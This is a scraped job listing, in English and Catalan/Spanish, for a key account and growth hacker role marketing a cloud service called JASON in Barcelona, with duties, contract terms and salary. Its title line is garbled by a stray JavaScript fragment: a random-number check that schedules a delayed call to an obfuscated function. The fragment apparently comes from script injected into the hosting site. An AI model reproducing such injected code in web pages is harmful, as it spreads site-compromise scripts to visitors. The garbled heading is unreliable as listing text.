Ofertas de Empleo

Key account andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and growth hacker

Key account and growth hacker

Empresa: BASA
Provincia: Barcelona
Población:  Barcelona
You will work in a dynamic team of BizDevelopers and software/navigation engineers, in charge of our cloud service JASON marketing and commercial account, in particular you will:

Plan and execute marketing campaigns for the growth of our JASON cloud service.
Undergo SEM campaigns and put in place SEO strategies to increase the number of service leads.
Collaborate with channel-specific marketing teammates (blogging, email, social media, etc.) to identify areas for growth
Test and optimize marketing tactics for customer acquisition (e.g. online advertising, direct mail, out of home, affiliate) and conversion rate optimization
Occasionally develop and implement front-end web code where appropriate to maximize the benefits for the marketing team´s goals. Our software developers might also assist you on this one, if needed.
Conduct and present competitive analyses and market research
Contribute to the JASON commercial strategy (up-selling campaigns, promotions…)
Propose creative new projects, from building free tools and apps that attract prospects and convert leads to testing new approaches to capturing existing demand
Translate ideas to actionable items that deliver business results
Analyze, recommend and lead the implementation of improvement initiatives
Keep abreast with the latest trends and changes in UI/UX and digital marketing
Identify industry trends and insights

-Tipus de relació professional: Contracte

-Tipologia de contracte: Temporal

-Durada de contracte: 2 anys

-Núm. Hores setmanals: 40

-Horari: Flexible

-Retribució brut anual: >= 30000


-Categoria professional: Tècnics superiors i assimilats

-Temps d´experiència: +3

-Competències personals més desenvolupades: Competències digitals, Treball en equip i Cooperació, Creativitat, Orientació al Client, Planificació i organització, Iniciativa, Orientació a l´assoliment, Comunicació
Tecnologías: SEO SEM,
Tipo de Contrato: 
Salario: 30000 € – 33000 € Bruto/año
Experiencia: 2 años
Funciones: Marketing – SEO/Posicionamiento Web
Formación mínima: 
Ingeniero Tecnico
Descubre más: https://www.tecnoempleo.com/key-account-and-growth-hacker-barcelona/seo-sem/rf-dd4014133rc98cf665sa

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